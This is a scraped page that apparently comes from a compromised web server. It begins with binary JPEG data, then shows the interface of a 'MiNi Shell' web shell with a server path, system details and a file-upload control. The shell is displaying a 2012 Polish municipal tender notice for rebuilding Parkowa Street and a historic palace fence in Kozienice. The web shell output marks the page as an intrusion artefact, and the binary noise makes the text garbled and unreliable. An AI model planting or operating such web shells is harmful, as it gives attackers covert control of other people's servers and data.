JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120613/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120613/199730-N-2012.html

<p class="kh_header"><b>Kozienice: Przebudowa ulicy Parkowej</b><br>
<b>Numer ogłoszenia: 199730 - 2012; data zamieszczenia: 13.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Kozienice , ul. Parkowa 5, 26-900 Kozienice, woj. mazowieckie, tel. 048 6117100, faks 048 6142048.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kozienice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ulicy Parkowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja robót budowlanych w związku z przebudową ulicy Parkowej 
w Kozienicach obejmująca: remont jezdni o nawierzchni z betonu asfaltowego i kostki betonowej, remont chodników i zjazdów z kostki betonowej, przebudowę kanalizacji deszczowej, sieci teletechnicznej 
i elektroenergetycznej w ulicy Parkowej oraz remont i przebudowę zabytkowego ogrodzenia Zespołu Pałacowo-Parkowego wzdłuż ulicy Parkowej i dojazdu do Urzędu Skarbowego w Kozienicach. Zadanie będzie realizowane w oparciu o dokumentację projektową remontu ulicy Parkowej (br. drogowa, sanitarna, teletechniczna, elektryczna) i dokumentację projektową remontu i przebudowy ogrodzenia Zespołu Pałacowo-Parkowego, zgodnie z zasadami wiedzy technicznej i sztuki budowlanej z uwzględnieniem wymagań określonych w szczegółowych specyfikacjach technicznych wykonania i odbioru robót oraz z zachowaniem warunków określonych w siwz.
Zakres robót:
1.	Roboty drogowe:
1.1.	Roboty ziemne.
1.2.	Roboty przygotowawcze, rozbiórkowe: rozbiórka nawierzchni jezdni, chodników, zjazdów, obrzeży betonowych, krawężników betonowych.
Gruz z rozbiórki należy wywieźć i zutylizować. Nadmiar ziemi wywieźć. Wywóz i utylizacja materiałów z rozbiórki w zakresie i na koszt Wykonawcy. 
1.3.	Nawierzchnia ul. Parkowej:
- warstwa ścieralna z betonu asfaltowego dla ruchu KR3 gr. 5 cm,
- warstwa wyrównawcza z betonu asfaltowego dla ruchu KR3 gr. od 3 - 14 cm.
Istniejący krawężnik kamienny miejscowo należy przestawić oraz lokalnie wyregulować wysokościowo. Od strony Stadniny Koni krawężnik do wymiany. Krawężniki betonowe o wym. 15x30 na podsypce cementowo-piaskowej i ławie betonowej z oporem z betonu B15.
1.4.	Skrzyżowanie z ul. Radomską:
- warstwa ścieralna z betonu asfaltowego dla ruchu KR3 gr. 5 cm,
- podbudowa zasadnicza z betonu asfaltowego gr. 13 cm,
- podbudowa z kruszywa łamanego gr. 20 cm,
- warstwa odcinająca z piasku gr. 15 cm.
Istniejący krawężnik kamienny miejscowo należy przestawić oraz lokalnie wyregulować wysokościowo.
1.5.	Nawierzchnia drogi dojazdowej do Urzędu Skarbowego:
- kostka brukowa gr. 8 cm w kolorze szarym,
- podsypka cementowo-piaskowa gr. 3 cm,
- podbudowa z kruszywa łamanego gr. 23 cm,
- warstwa odcinająca z piasku gr. 15 cm.
Krawężniki betonowe o wym. 15x30cm na podsypce cementowo-piaskowej i ławie betonowej z oporem z betonu B15.
1.6.	Nawierzchnia zjazdów:
- kostka brukowa betonowa gr. 8 cm w kolorze szarym,
- podsypka cementowo-piaskowa gr. 3 cm,
- podbudowa z kruszywa łamanego gr. 15 cm,
- warstwa odcinająca z piasku gr. 15 cm.
Krawężniki betonowe wtopione o wym. 12x25cm na ławie z betonu B15
1.7.	Nawierzchnia chodników:
- kostka brukowa gr. 6 cm kolorowa (na przejściach dla pieszych płytki z wypustkami o wym. 40x40x5cm),
- podsypka cementowo-pisakowa gr. 5 cm,
- gruntocement o RM - 5,5MPa gr. 10 cm.
Obrzeża betonowe 8x30x100cm na podsypce cementowo-piaskowej gr, 5 cm.
1.8.	Ściek w ulicy Parkowej:
- prefabrykowany ściek betonowy o wym. 50x15cm
- podsypka cementowo-piaskowa 1:4 gr. 5 cm,
- ława betonowa z betonu B-15 gr. 15 cm.
       1.9. Uzupełnienie zieleni:
- lokalne odtworzenie istniejących trawników na warstwie ziemi urodzajnej gr. 10cm. Grunt należy przekopać. Do siewu użyć nasion traw odpornych na warunki miejskie.
        1.10. Organizacja ruchu: 
-  tymczasowa na czas prowadzenia robót - Wykonawca opracuje projekt czasowej organizacji ruchu wraz z uzyskaniem wymaganych zezwoleń, w tym zajęcie pasa drogowego drogi gminnej, powiatowej i krajowej oraz dokona oznakowania na czas prowadzenia robót zgodnie z przepisami. Wykonawca nie ponosi kosztów z tytułu zajęcia pasa drogowego drogi gminnej w związku z realizacją zamówienia. 
Uwaga: Wykonawca umożliwi przejazd środków komunikacji PKS na czas prowadzenia robót. Sposób komunikacji wykonawca uzgodni z Zarządem PKS.
- stała organizacja ruchu - zgodnie z projektem. Istniejące oznakowanie nie ulega zmianom. W celu poprawy bezpieczeństwa ruchu pieszego na drodze dojazdowej do Urzędu Skarbowego należy zamontować próg zwalniający U-16d i uzupełnić oznakowanie pionowe i poziome. Na czas budowy istniejące oznakowanie należy zdemontować i zamontować powtórnie po wykonaniu robót.

2. Przebudowa kanalizacji deszczowej
2.1. Włączenie dwóch projektowanych wpustów deszczowych do istniejącej kanalizacji deszczowej 
w ul. Parkowej wraz z zabudowaniem studni betonowej śr. 1200mm w obrębie skrzyżowania z ulicą Kochanowskiego. Przykanaliki z rur PVC SN8 śr. 200mm
2.2. Regulacja pionowa i pozioma dwóch wpustów deszczowych na skrzyżowaniu ul. Parkowej z ul. Kochanowskiego.
2.3. Na wszystkich studniach kanalizacji sanitarnej i deszczowej należy zamontować pierścienie odciążające wraz z płytami nastudziennymi i włazami typu ciężkiego. Studnie należy wyregulować do rzędnych projektowanej nawierzchni. Wpusty deszczowe uliczne żeliwne uchylne Osadzone na studzience betonowej śr. 500mm, wyposażone w kosze stalowe ocynkowane do wyłapywania części stałych wraz z osadnikami. Wpusty deszczowe należy osadzić na żelbetowym pierścieniu odciążającym i przykryć prefabrykowaną betonową płytą. 
Zwieńczenie studni i wpustów deszczowych w klasie D400.
       2.4.Próby szczelności kanału.

3. Przebudowa kanalizacji teletechnicznej
3.1.Regulacja wysokościowa istniejącej studni kanalizacji teletechnicznej zlokalizowanej w pasie projektowanego chodnika.
3.2. Wymiana studni teletechnicznej zlokalizowanej w pasie zieleni. Studnię należy wyburzyć zachowując układ kabli telekomunikacyjnych. W miejscu starej studni zabudować nową dwuczęściową studnię betonową
Przed przystąpieniem do robót Wykonawca ma obowiązek pisemnie wystąpić z 30 dniowym wyprzedzeniem o wyznaczenie upoważnionego przedstawiciela TP S.A celem dokonania uzgodnień formalnych wykonania robót i odbioru robót.

4. Przebudowa sieci elektroenergetycznej
4.1.Demontaż istniejącego słupa i linii napowietrznej i ponowny montaż słupa w odległości ok. 1m od ogrodzenia.
4.2. Sprawdzenia i pomiary izolacji linii
Wszelkie roboty mogą być wykonywane po ich zgłoszeniu do RZE Kozienice przez osoby wykwalifikowane.

5. Remont i przebudowa ogrodzenia Zespołu Pałacowo-Parkowego (obiekt wpisany do rejestru zabytków prawomocną decyzją WKZ Radom Nr 98/A/81 z dnia 18.03.1981r.)
5.1. Remont fragmentu ogrodzenia od ul. Parkowej do parkingu Urzędu Skarbowego (odcinek A i B)
5.1.1. Remont ogrodzenia A (A1-A2) - wykonanie izolacji przeciwwilgociowych fundamentów ogrodzenia, wymianę pasa zawilgoconych tynków, malowanie ogrodzenia, impregnację czapki muru i inne prace towarzyszące:
1) roboty rozbiórkowe i demontażowe:
- cięcie pielęgnacyjne gałęzi 3 szt. drzew (wywóz i utylizacja gałęzi w zakresie i na koszt wykonawcy)
- skucie tynku z cokołu ogrodzenia od strony drogi,
- skucie zawilgoconych tynków przęseł i słupów na wysokość zawilgocenia, powyżej cokołu, po obu stronach ogrodzenia,
- skucie odspojonego tynku wzdłuż pionowych pęknięć na styku przęseł ze słupami po obu stronach,
- usunięcie całkowite farby z pozostałego tynku po obu stronach ogrodzenia,
- odcinkowe odkopanie muru ogrodzenia na głębokość 30 cm poniżej terenu, po obu stronach.
Wywóz i utylizacja materiałów z rozbiórki i gałęzi w zakresie i na koszt wykonawcy.
2) przygotowanie podłoża:
- zmycie, oczyszczenie i usunięcie części muru i luźnej zaprawy ze spoin na głębokość 2 cm,
- zmycie i odsolenie systemowym preparatem do chemicznego wiązania szkodliwych soli powierzchni ze stwierdzonymi wykwitami soli oraz powierzchni o wysokości około 1 m powyżej powierzchni zasolonych,
3) podmurowanie cokołu z cegły pełnej, pionowo na płask na zaprawie cementowo-wapiennej, odpowiednio docinając, wierzch cokołu z 5% spadkiem na zewnątrz ściany,
4) uzupełnienie większych ubytków po skuciach, w spoinach i na powierzchni cegieł dla wyrównania powierzchni pod projektowane izolacje z zaprawy szlamowej z wykorzystaniem gotowej mieszanki zaprawy wyrównującej przez szpachlowanie,
5) gruntowanie podłoża mineralnego powierzchni po skuciach systemowym podkładem wgłębnym lub penetrującym,
6) izolacje przeciwwilgociowe - szlamowa zaprawa izolacyjna. Izolacja pionowa na ścianach fundamentowych do głębokości około 30 cm poniżej poziomu terenu oraz na wysokość cokołu i pas 30 cm nad cokołem jako izolacja przeciwrozbryzgowa po obu stronach muru. Zaprawa szlamowa izolacyjna z hydraulicznym środkiem wiążącym, nie przepuszczająca wody, paroprzepuszczalna i odporna na sole, nakładana dwuwarstwowo. Minimalna grubość warstwy 2 mmm.
Izolację po wyschnięciu należy zabezpieczyć w gruncie na wysokość do projektowanej opaski folią budowlaną PE. Zasypywanie wykopu warstwami gruntu bez kamieni, gruzu oraz od góry warstwami podbudowy chodnika, każda warstwa gruntu do zagęszczenia.
7) tynki renowacyjne - systemowe tynki renowacyjne na cokołach i ściankach bezpośrednio nad nimi, jako uzupełnienie po skuciach zawilgoconych i zasolonych tynków:
- obrzutka renowacyjna - wykonanie na przygotowanych powierzchniach szprycu odpornego na wysolenia, zwiększającego przywieralność powłok tynkarskich do podłoża z zaprawy systemowej. Obrzutka może przykrywać maksymalnie 50-60% powierzchni ściany, grubość warstwy ok. 5 mm. Podłoże należy zabezpieczyć przed zbyt szybkim wysychaniem przez okresowe zwilżanie warstwy,
- tynk renowacyjny nawierzchniowy - wykonanie tynków renowacyjnych drobnoziarnistych o uziarnieniu od 0-1,3 mm z efektem samonapowietrzania, jako warstwy nawierzchniowej. Tynk o dużej porowatości ok. 45% z właściwościami magazynowania soli, o małym oporze dyfuzyjności, o właściwościach wodoodpornych z dodatkiem hydrofobizującym.Tynk nakładany dwuwarstwowo, z uwzględnieniem przerw technologicznych. Grubość poszczególnych warstw należy dobrać do grubości istniejących tynków. Wierzchnią warstwę wykonać gładką w nawiązaniu do istniejących tynków.
8) ozdobna opaska - do odtworzenia po skuciu tynku z gotowej systemowej zaprawy gruboziarnistej do profili ciągnionych, o właściwościach hydrofobowych i niewielkim skurczu, nakładana warstwami, po utwardzeniu warstw poprzednich.
9) wykończenie odtwarzanych opasek i przetarcie po usunięciu farby zaprawą sztukatorską drobnoziarnistą do profili ciągnionych. Zaprawa szybkowiążąca o maksymalnej grubości warstwy 2-3mm, do wykończenia farbą elewacyjną,
10) dylatacje - przy pionowych pęknięciach uzupełnienie ubytków w tynkach zaprawą cementowo-wapienną lub wyrównującą, z pozostawieniem pionowej szczeliny w miejscu projektowanych dylatacji. Wypełnienie szczeliny dylatacyjnej elastyczną fugą silikonową po obu stronach muru,
11) malowanie ścian dyfuzyjną, wodoodporną, o wysokiej zdolności krycia, matowa farbą silikonową z przyjętego systemu, kolor starej bieli zbliżony do koloru istniejącego ogrodzenia. Farba odporna na zanieczyszczenia, utrudniająca rozwój mikroorganizmów, o niskiej nasiąkliwości i niskiej podatności na zabrudzenia,
- przygotowanie podłoża - oczyszczenie powierzchni z piaszczącego się tynku, odspojonych powłok malarskich, mechaniczne usunięcie większych zabrudzeń, zmycie powierzchni myjką ciśnieniową, przetarcie ewentualnych ubytków drobnoziarnistą zaprawą wyrównującą z gotowych mieszanek,
- gruntowanie - na całej powierzchni 1-krotny podkład wgłębny gruntujący do wzmacniania podłoży mineralnych pod wymalowania farbami silikonowymi,
- malowanie - po upływie 24 godz.od zagruntowania ( zgodnie z instrukcją) warstwą podkładową, a następnie nawierzchniową z zachowaniem odpowiedniego odstępu czasowego między kolejnymi warstwami.
12) impregnacja - czapki betonowej, murów i wierzchu muru pod przęsłami ażurowymi do mechanicznego oczyszczenia z zanieczyszczeń i odkurzenia powierzchni. Zaimpregnowanie powierzchni preparatem zmniejszającym chłonność podłoża i nadającym powierzchni właściwości hydrofobowe, z bezbarwnej, rozcieńczonej wodą emulsji silikonowej,
13) przęsła ażurowe - do oczyszczenia i malowania:
- zabezpieczenie antykorozyjne -Farba chlorokauczukowa przeciwrdzewna do gruntowania - 1 warstwa. Do wykończenia emalia chlorokauczukowa -2 warstwy. Barwa emalii zgodna z kolorystyką.
14) opaska - od strony dojazdu wykończenie kostka betonową (zgodnie z projektem drogowym); od strony parku opaska szerokości 40 cm z warstwy żwiru płukanego gr. 6cm na podsypce z piasku. Opaska na styku z zielenią zakończona obrzeżem betonowym.
5.1.2. Remont ogrodzenia B (B1-B2)- rozbiórka zniszczonego muru i odtworzenie go w istniejących gabarytach, z wykonaniem otworu na przejście dla pieszych:
1) rozbiórki i demontaże:
- rozbiórka trzech przęseł ogrodzenia, za wyjątkiem słupa narożnego bramy,
- usunięcie muru fundamentowego z ziemi,
- cięcie pielęgnacyjne gałęzi drzewa zwisające nad ogrodzeniem.
Wywóz i utylizacja materiałów z rozbiórki i gałęzi w zakresie i na koszt wykonawcy.
2) fundamenty ogrodzenia - odtworzenie o szerokości jak istniejące, na głębokość 1,10m, w uskokach do istniejącego pochylenia terenu, na warstwie gr. 10 cm z betonu podkładowego B-10. Fundamenty oddylatowane od ściany garażu i słupa bramy przekładką z 2 warstw folii budowlanej PE. Wykonanie izolacji poziomej typu lekkiego z 1 warstwy lepiku asfaltowego. Fundamenty wylewane do poziomu terenu od strony garaży, z betonu B-15 w deskowaniu. W miejscu słupów zbrojenie rdzeni pionowe 4 prętami śr.12 ze stali A-III, strzemiona śr.6 co 25 cm ze stali A-0. 
3) izolacja przeciwwilgociowa - izolacje pionowe murów fundamentowych do poziomu terenu z 1 warstwy lepiku asfaltowego jak dla izolacji typu lekkiego. Izolacja zabezpieczona w gruncie warstwą folii izolacyjnej PE gr. Min. 0,2mm.
4) przęsła i słupy - murowane z cegły ceramicznej pełnej na zaprawie cementowo-wapiennej o gabarytach jak istniejące, z pozostawieniem otworu przejścia. Słupy murowane z pozostawieniem rdzenia ze zbrojeniem wg opisu jak wyżej, do betonowania warstwami. Przęsła gr. 12 cm zbrojone poziomo 2 prętami o6 ze stali A-0 w spoinie co 4 warstwa cegieł. Nadproże nad otworem przejścia z betonu B-20, zbrojenie 4 prętami o12 ze stali A-III, strzemiona o6 co 15cm ze stali A-0.
5) izolacja przeciwwilgociowa - izolacje murów przęseł i słupów od 10 cm poniżej poziomu terenu na wysokość cokołu z zaprawy szlamowej izolacyjnej, z wyłożeniem zaprawy izolacyjnej na wierzch uskoku cokołu. Zasypywanie wykopu warstwami gruntu z zagęszczeniem każdej warstwy.
6) czapka - przęseł i słupów do odtworzenia ze skosem jaki istniejąca, wylewana z betonu B-20, w deskowaniu, od spodu kształtowanie podcięcia kapinosu. Czapka impregnowana środkiem hydrofobowym wg opisu jak w ogrodzeniu A
7) wykończenie - tynk cementowo-wapienny gładki. Malowanie farbą silikonową na zagruntowanym podłożu wg opisu jak dla ogrodzenia A.
8) słup bramy - istniejący słup bramy w ogrodzeniu B do remontu tj. wykonania izolacji przeciwwilgociowych i tynków renowacyjnych wg zasad opisanych dla ogrodzenia A. Malowanie powierzchni słupa farbą silikonową i impregnacja czapki łącznie z całym odcinkiem ogrodzenia B. Dylatacja, pomiędzy słupem a przęsłem z otworem, zachowana na całej wysokości, z obustronnym wypełnieniem spoiną silikonową.
9) opaska - po obu stronach muru opaska szerokości 40cm, z warstwy żwiru płukanego gr. 6 cm na podsypce z piasku. Opaska na styku z zielenią zakończona obrzeżem betonowym.
10) zieleń - od strony ul. Parkowej trawnik do otworzenia po robotach budowlanych.
11) niski murek wzdłuż dojazdu (C1-C2)- do rozbiórki na głębokość około 15 cm poniżej projektowanego poziomu chodnika, z pozostawieniem fundamentu w ziemi. Na wierzchu do uzupełnienia warstwy chodnika ujęte w projekcie drogowym. Wywóz i utylizacja gruzu w zakresie i na koszt Wykonawcy.

5.2. Częściowy remont ogrodzenia usytuowanego wzdłuż ulicy Parkowej (Odcinek A1-D-E do L)
1) Zabezpieczenie ogrodzenia do wysokości cokołu w tym: 
- odkopanie muru ogrodzenia na głębokość 60 cm poniżej terenu od strony ulicy, za wyjątkiem odcinka z istniejącą folią izolacyjną.
- zmycie i oczyszczenie z resztek gruntu i usunięcie luźnych części muru i zaprawy 
- uzupełnienie większych ubytków po skuciach i na powierzchni cokołu od strony chodnika, dla wyrównania powierzchni z wykorzystaniem gotowej mieszanki zaprawy wyrównującej przez szpachlowanie.
- podmurowanie cokołu na łuku od strony ul. Kochanowskiego, na odcinku gdzie istniejący cokół znalazł się poniżej terenu, z cegły ceramicznej pełnej gr.6,5cm na zaprawie cementowo-wapiennej, odpowiednio je docinając.
- izolacje przeciwwilgociowe w gruncie z folii izolacyjnej kubełkowej, kubełkami zwróconymi w stronę ściany. Od góry folia zakończona systemową listwą wentylacyjną zabezpieczającą przed zaśmieceniem i zalewaniem wodami opadowymi pustki powietrznej. Zasypywanie wykopu warstwami gruntu, od góry ułożenie warstwami podbudowy chodnika (godnie z projektem drogowym), każda warstwa do zagęszczenia. Nad istniejącą folią kubełkową, po jej docięciu do poziomu chodnika i terenu, zamontowanie systemowych listew wentylacyjnych.
-oczyszczenie istniejącej folii izolacyjnej z zanieczyszczeń i montaż systemowych listew wentylacyjnych.
2) Zieleń - od strony ul. Parkowej trawnik do odtworzenia po robotach budowlanych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy PZP do wysokości 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.24-4, 45.11.12.00-0, 45.23.32.22-1, 45.11.27.10-5, 45.23.32.90-8, 45.23.21.30-2, 45.31.56.00-4, 45.31.40.00-1, 45.45.30.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 76.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje zabezpieczenia ofert wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania wiedzy i doświadczenia - że w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wykonał:
- co najmniej jedno zamówienie polegające na wykonaniu robót budowlanych przedmiotem których było wykonanie nawierzchni bitumicznej o powierzchni min. 2000m2 i załączy dokumenty potwierdzające, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone
i
- co najmniej jedno zamówienie polegające na wykonaniu robót budowlanych przedmiotem których były w szczególności roboty tynkarskie i malarskie wykonane w obiektach nieruchomych wpisanych do rejestru zabytków i załączy dokumenty potwierdzające, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami zdolnymi do wykonania zamówienia - że dysponuje co najmniej:
- jedną osobą posiadającą kwalifikacje zawodowe do kierowania robotami budowlanymi tj. osobą posiadającą uprawnienia budowlane w rozumieniu przepisów ustawy z dn. 
7 lipca 1994r. Prawo Budowlane ( Dz.U. z 2006r. Nr 156, poz. 1118 ze zm.) w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów
i
jedną osobą posiadającą kwalifikacje zawodowe do kierowania robotami budowlanymi przy zabytkach nieruchomych zgodnie z §8.1 rozporządzenia Ministra Kultury z dnia 9 czerwca 2004r (DZ.U. z 2004r. Nr 150, poz.1579) tj. osobą posiadającą uprawnienia budowlane w rozumieniu przepisów ustawy z dn. 7 lipca 1994r. Prawo Budowlane ( Dz.U. z 2006r. Nr 156, poz. 1118 ze zm.) w specjalności konstrukcyjno-budowlanej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odbyły co najmniej 2 letnią praktykę zawodową na budowie przy zabytkach nieruchomych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

